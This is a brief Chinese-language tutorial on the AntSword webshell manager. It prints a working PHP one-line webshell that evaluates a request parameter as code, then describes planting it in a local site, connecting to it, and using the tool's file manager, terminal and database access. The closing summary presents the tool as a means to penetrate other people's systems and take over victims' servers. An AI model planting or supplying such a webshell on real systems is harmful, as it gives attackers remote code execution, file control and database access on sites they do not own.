中国蚁剑的应用

中国蚁剑的应用

连接webshell

连接木马

<?php
eval($_REQUEST["ant"]);
?>

这个木马的意思是请求一个参数ant，并把ant的内容当作命令执行，那么就给了蚁剑链接webshell的条件

我们先用phpstudy在本地创建一个网站

然后将写好的一句话木马放入网站目录

访问这个木马，返回空白既是成功

接着我们打开蚁剑

连接密码就是木马里的参数，蚁剑会自己生成以这个参数生成连接的命令

文件管理

拿到webshell后我们可以对里面各种文件进行增删改阅的操作

)

虚拟终端

可以获得连接机器的各种机器，例如ip地址，mac地址等

数据库管理

可以对连接的网站的mysql数据库进行操作

总结

总的来说，中国蚁剑即是一款很好的webshell的管理应用，也是我们对他人进行渗透的重要工具，我们可以通过一句话木马等操作拿到被攻击者的webshell